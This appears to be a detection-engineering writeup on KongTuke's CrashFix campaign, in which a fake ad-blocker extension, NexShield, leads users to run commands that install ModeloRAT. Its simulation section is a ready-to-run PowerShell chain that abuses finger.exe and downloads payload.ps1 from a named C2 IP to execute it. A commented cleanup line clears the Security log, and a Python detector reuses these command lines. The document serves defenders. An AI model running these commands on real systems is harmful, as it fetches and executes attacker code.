Dissecting CrashFix: KongTuke’s New Toy
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
KongTuke distributed a malicious Chrome extension, NexShield, mimicking uBlock Origin Lite. Once installed, it displays a “CrashFix” security warning to simulate a legitimate browser security incident, crashes the browser, and coerces the user into executing a malicious PowerShell command copied to the clipboard. The campaign deploys a Python RAT, ModeloRAT, on domain-joined systems and a multi-stage PowerShell chain on standalone hosts.
Investigation
Huntress analysts reviewed the extension’s code, linked its command-and-control to nexsnield.com, and reverse engineered the payloads. They observed abuse of finger.exe as a LOLBin to retrieve attacker instructions, plus a DGA that generates .top domains. On domain-joined hosts, the researchers identified an RC4-encrypted Python implant that persists via the HKCU Run key. Additional tradecraft included anti-analysis checks, AMSI bypasses, and resource-exhaustion tactics intended to pressure users into complying quickly and completely.
Mitigation
Block the Chrome extension ID and monitor for unknown extensions that impersonate popular ad blockers. Detect beaconing to nexsnield.com, the C2 IPs, and DGA-produced domains. Apply execution control to limit LOLBin usage (including finger.exe) and alert on suspicious Run-key values, particularly names crafted to resemble widely used software.
Response
Alert on NexShield-related extension installations and correlate with outbound connections to the identified C2 and DGA infrastructure. Isolate affected hosts and collect extension artifacts, registry Run keys, scheduled tasks, and dropped files. Remove ModeloRAT persistence, eradicate PowerShell-stage components, and remediate and validate the endpoint.
Attack Flow
```mermaid
graph TB
    %% Class definitions
    classDef action fill:#FFEEAA
    classDef tool fill:#99CCFF
    classDef malware fill:#FF9999
    classDef process fill:#CCFFCC
    classDef persistence fill:#D9D9D9
    classDef operator fill:#FFCC66

    %% Nodes
    content_injection["<b>Action</b> – <b>T1659 Content Injection</b><br/>Malicious advertisement redirects victim to a fake Chrome Web Store page offering a malicious extension"]
    class content_injection action
    software_extension["<b>Action</b> – <b>T1176 Software Extensions</b><br/>Malicious extension masquerading as uBlock Origin Lite is installed in the browser"]
    class software_extension action
    extension_nexshield["<b>Tool</b> – <b>Name</b>: NexShield (malicious Chrome extension)<br/><b>Description</b>: Provides persistence and executes further malicious logic"]
    class extension_nexshield tool
    user_execution["<b>Action</b> – <b>T1204.004 User Execution</b><br/>Extension copies a PowerShell command to the clipboard and victim runs it via Win+R"]
    class user_execution action
    powershell_process["<b>Process</b> – <b>T1059.001 PowerShell</b><br/>Executes PowerShell command that downloads additional payloads"]
    class powershell_process process
    cmd_process["<b>Process</b> – <b>T1059.003 Windows Command Shell</b><br/>PowerShell invokes cmd.exe to run further stages"]
    class cmd_process process
    sandbox_evasion["<b>Action</b> – <b>T1497.002 Virtualization/Sandbox Evasion</b><br/>Payload performs extensive VM, sandbox and analysis-tool checks"]
    class sandbox_evasion action
    dos_exhaustion["<b>Action</b> – <b>T1499.003 Endpoint Denial of Service</b><br/>Creates billions of Chrome runtime ports to exhaust CPU and memory, causing browser crash"]
    class dos_exhaustion action
    event_trigger["<b>Action</b> – <b>T1546 Event Triggered Execution</b><br/>Uses Chrome Alarms API to delay malicious actions by 60 minutes and repeat every 10 minutes"]
    class event_trigger action
    dead_drop["<b>Action</b> – <b>T1102.001 Web Service Dead Drop Resolver</b><br/>Contacts dynamically generated DGA domains to retrieve further stages"]
    class dead_drop action
    dga_resolution["<b>Action</b> – <b>T1568 Dynamic Resolution</b><br/>Domain generation algorithm produces weekly rotating domains for C2"]
    class dga_resolution action
    bidirectional_comm["<b>Action</b> – <b>T1102.002 Web Service Bidirectional Communication</b><br/>ModeloRAT exchanges encrypted commands and responses over HTTP"]
    class bidirectional_comm action
    oneway_comm["<b>Action</b> – <b>T1102.003 Web Service One-Way Communication</b><br/>Sends telemetry and install/update data to attacker-controlled server"]
    class oneway_comm action
    encrypted_rc4["<b>Action</b> – <b>T1573.001 Encrypted Channel</b><br/>C2 traffic is encrypted with RC4 symmetric cryptography"]
    class encrypted_rc4 action
    obfuscation["<b>Action</b> – <b>T1027 Obfuscated Files or Information</b><br/>Payloads are layered with Base64, XOR and AES encryption"]
    class obfuscation action
    stripped_payload["<b>Action</b> – <b>T1027.008 Stripped Payloads</b><br/>Payloads are stripped and encoded to evade analysis"]
    class stripped_payload action
    embedded_payload["<b>Action</b> – <b>T1027.009 Embedded Payloads</b><br/>Encrypted payloads are loaded directly in memory"]
    class embedded_payload action
    appcert_dll["<b>Action</b> – <b>T1546.009 Event Triggered Execution: AppCert DLLs</b><br/>DoS loop leverages Chrome runtime ports analogous to AppCert DLL technique"]
    class appcert_dll action
    remote_access_tool["<b>Malware</b> – <b>T1219 Remote Access Tools</b><br/>ModeloRAT provides full remote-access capabilities"]
    class remote_access_tool malware
    persistence_run["<b>Action</b> – <b>T1554 Compromise Host Software Binary</b><br/>HKCU\Software\Microsoft\Windows\CurrentVersion\Run entry launches pythonw.exe for persistence"]
    class persistence_run persistence
    exec_guardrail["<b>Action</b> – <b>T1480.002 Execution Guardrails</b><br/>Checks for prior execution via UUID beacons to avoid duplicate infections"]
    class exec_guardrail action

    %% Edges
    content_injection -->|leads_to| software_extension
    software_extension -->|installs| extension_nexshield
    extension_nexshield -->|provides_persistence| persistence_run
    extension_nexshield -->|copies_command| user_execution
    user_execution -->|triggers| powershell_process
    powershell_process -->|launches| cmd_process
    powershell_process -->|performs| sandbox_evasion
    sandbox_evasion -->|allows| powershell_process
    powershell_process -->|creates| dos_exhaustion
    dos_exhaustion -->|uses| appcert_dll
    extension_nexshield -->|sets| event_trigger
    event_trigger -->|delays| powershell_process
    powershell_process -->|contacts| dead_drop
    dead_drop -->|uses| dga_resolution
    dga_resolution -->|provides| bidirectional_comm
    bidirectional_comm -->|encrypts_with| encrypted_rc4
    bidirectional_comm -->|exchanges_with| remote_access_tool
    oneway_comm -->|sends_to| encrypted_rc4
    powershell_process -->|obfuscates_using| obfuscation
    obfuscation -->|includes| stripped_payload
    obfuscation -->|includes| embedded_payload
    remote_access_tool -->|communicates_via| bidirectional_comm
    remote_access_tool -->|sends_telemetry| oneway_comm
    persistence_run -->|creates| exec_guardrail
    exec_guardrail -->|prevents| persistence_run
```
Detections
- Call Suspicious .NET Methods from Powershell (via powershell)
- Suspicious CURL Usage (via cmdline)
- Short File Name (via cmdline)
- Possible Hands-on or Scripting Operation was Performed in Unusual Folders (via cmdline)
- Suspicious Powershell Strings (via powershell)
- Call Suspicious Windows API Functions from Powershell (via powershell)
- Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via registry_event)
- An Archive Was Extracted To Suspicious Directory Using Powershell (via powershell)
- Python Execution from Suspicious Folders (via cmdline)
- Possible Powershell Obfuscation Indicators (via powershell)
- Possible System Enumeration (via cmdline)
- Download or Upload via Powershell (via cmdline)
- IOCs (SourceIP) to detect: Dissecting CrashFix: KongTuke’s New Toy
- IOCs (HashSha256) to detect: Dissecting CrashFix: KongTuke’s New Toy
- IOCs (DestinationIP) to detect: Dissecting CrashFix: KongTuke’s New Toy
- IOCs (Emails) to detect: Dissecting CrashFix: KongTuke’s New Toy
- Detect KongTuke CrashFix Malicious Command Execution [Windows Process Creation]
- Detection of AMSI Bypass and Evidence Removal via PowerShell [Windows Powershell]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
- Attack Narrative & Commands: The adversary first copies the legitimate finger.exe binary to the temporary directory, renames it to ct.exe, and then uses a nested cmd /c chain to invoke the copied binary with a crafted argument that contacts a remote C2 server (199.217.98.108). The binary writes the server's response (the payload) to standard output, which is then piped into a second hidden cmd that executes the received code. Afterwards, the attacker leverages PowerShell to download a secondary payload via Invoke-WebRequest and immediately executes it with iex. All steps are performed with minimal UI (/min) so the user is unlikely to notice.
  1. Copy finger.exe → %TEMP%\ct.exe
  2. Run: cmd /c start "" /min cmd /c "copy %windir%\system32\finger.exe %temp%\ct.exe&%temp%\ct.exe confirm@199.217.98.108|cmd"
  3. PowerShell download & execute secondary payload: powershell -NoProfile -WindowStyle Hidden -Command "iex (Invoke-WebRequest -Uri 'http://199.217.98.108/payload.ps1' -UseBasicParsing).Content"
- Regression Test Script: The script below reproduces the full attack chain on a Windows test machine. Run it in an elevated PowerShell session.
```powershell
#-------------------------------------------------
# KongTuke CrashFix Malicious Command Execution
#-------------------------------------------------
# 1. Deploy the LOLBin (finger.exe) to %TEMP% as ct.exe
$fingerPath = "$env:windir\system32\finger.exe"
$tempExe    = "$env:TEMP\ct.exe"
Copy-Item -Path $fingerPath -Destination $tempExe -Force

# 2. Execute the malicious cmd chain (matches the Sigma rule)
$maliciousCmd = 'cmd /c start "" /min cmd /c "copy %windir%\system32\finger.exe %temp%\ct.exe&%temp%\ct.exe confirm@199.217.98.108|cmd"'
Start-Process -FilePath "cmd.exe" -ArgumentList "/c $maliciousCmd" -WindowStyle Hidden

# 3. PowerShell web-download-execute secondary payload
$payloadUrl = 'http://199.217.98.108/payload.ps1'
$psCommand  = "iex (Invoke-WebRequest -Uri '$payloadUrl' -UseBasicParsing).Content"
Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `"$psCommand`"" -WindowStyle Hidden
#-------------------------------------------------
```
- Cleanup Commands: Remove artifacts and terminate any lingering processes created by the test.
```powershell
# Delete the copied ct.exe
Remove-Item -Path "$env:TEMP\ct.exe" -ErrorAction SilentlyContinue

# Kill any stray cmd.exe or powershell.exe processes started by the test (filter by specific command line)
Get-WmiObject Win32_Process |
    Where-Object { $_.CommandLine -match 'finger\.exe|199\.217\.98\.108' } |
    ForEach-Object { $_.Terminate() | Out-Null }

# Optional: clear the Security event log if needed for repeatability
# wevtutil cl Security
```
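The Mitigation and Response guidance above, and the telemetry the regression test is meant to generate, come down to the same three host observables: finger.exe copied under a new name and its output piped into cmd, a PowerShell download-and-execute one-liner, and an HKCU Run value that launches pythonw.exe. The detector below is an added example, not the report's or the detection platform's own rule logic. It runs over constructed Sysmon-style process-creation and registry-set events; the field names (`event`, `image`, `original_file_name`, `cmdline`, `target_object`, `details`) are assumptions about the telemetry shape, and the sample events are constructed from the command lines quoted on this page.

```python
"""Added example: classify constructed endpoint events against the CrashFix
chain described above. Field names are assumptions (Sysmon-like), and the
events are constructed samples, not captured telemetry."""
import re
from typing import Dict, List

# Patterns derived from the command chain quoted in the report.
COPY_FINGER = re.compile(r"\bcopy\b[^&|]*finger\.exe[^&|]*\.exe", re.I)  # finger.exe copied to a new name
PIPE_TO_CMD = re.compile(r"\|\s*cmd(\.exe)?\b", re.I)                    # output piped into cmd
FINGER_ARGS = re.compile(r"\S+@\S+")                                      # finger's user@host argument
PS_DL_EXEC = re.compile(r"\biex\b.*invoke-webrequest|invoke-webrequest.*\|\s*iex\b", re.I)
RUN_KEY = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run\\", re.I)
PYTHONW = re.compile(r"pythonw?\.exe", re.I)


def classify(ev: Dict[str, str]) -> List[str]:
    """Return the names of the detections an event triggers (empty if benign)."""
    findings: List[str] = []
    kind = ev.get("event")
    if kind == "process_create":
        cl = ev.get("cmdline", "")
        image = ev.get("image", "").rsplit("\\", 1)[-1].lower()
        orig = ev.get("original_file_name", "").lower()
        # (a) copy-then-invoke chain: finger.exe duplicated and the result piped to cmd
        if COPY_FINGER.search(cl) and PIPE_TO_CMD.search(cl):
            findings.append("finger_lolbin_chain")
        # (b) renamed LOLBin: PE metadata still says finger.exe while the on-disk name differs
        if orig == "finger.exe":
            if image != "finger.exe":
                findings.append("renamed_finger_exe")
            if FINGER_ARGS.search(cl):
                findings.append("finger_outbound_query")
        # (c) download-and-execute one-liner
        if PS_DL_EXEC.search(cl):
            findings.append("powershell_download_execute")
    elif kind == "registry_set":
        # Run-key value whose launched binary is pythonw.exe, whatever the value is named
        if RUN_KEY.search(ev.get("target_object", "")) and PYTHONW.search(ev.get("details", "")):
            findings.append("run_key_pythonw_persistence")
    return findings


# Constructed sample events (not captured telemetry).
SAMPLE_EVENTS = [
    {   # the nested cmd chain from the report, as a process-creation event
        "event": "process_create", "image": r"C:\Windows\System32\cmd.exe", "original_file_name": "cmd.exe",
        "cmdline": r'cmd /c "copy %windir%\system32\finger.exe %temp%\ct.exe&%temp%\ct.exe confirm@199.217.98.108|cmd"',
    },
    {   # the renamed copy running; OriginalFileName still reads finger.exe
        "event": "process_create", "image": r"C:\Users\alice\AppData\Local\Temp\ct.exe",
        "original_file_name": "finger.exe",
        "cmdline": r"C:\Users\alice\AppData\Local\Temp\ct.exe confirm@199.217.98.108",
    },
    {   # PowerShell download-and-execute stage
        "event": "process_create", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "original_file_name": "PowerShell.EXE",
        "cmdline": 'powershell -NoProfile -WindowStyle Hidden -Command "iex (Invoke-WebRequest -Uri \'http://199.217.98.108/payload.ps1\' -UseBasicParsing).Content"',
    },
    {   # Run-key value launching pythonw.exe, named to resemble a common product
        "event": "registry_set",
        "target_object": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive Update",
        "details": r'"C:\Users\alice\AppData\Local\Programs\Python\Python312\pythonw.exe" C:\Users\alice\AppData\Roaming\svc.py',
    },
    {   # benign baseline: ordinary process
        "event": "process_create", "image": r"C:\Windows\System32\notepad.exe", "original_file_name": "NOTEPAD.EXE",
        "cmdline": r"notepad.exe C:\Users\alice\notes.txt",
    },
    {   # benign baseline: legitimate Run value
        "event": "registry_set",
        "target_object": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
        "details": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    },
]


def scan(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map event index to its findings, keeping only events that fired."""
    hits: Dict[int, List[str]] = {}
    for i, ev in enumerate(events):
        names = classify(ev)
        if names:
            hits[i] = names
    return hits


if __name__ == "__main__":
    for idx, names in scan(SAMPLE_EVENTS).items():
        print(idx, names)
```

Matching on `original_file_name` rather than the on-disk name is what catches the ct.exe copy: the PE version resource still identifies it as finger.exe. The Run-key check keys on the launched binary, not the value name, because the report notes that value names are chosen to resemble widely used software.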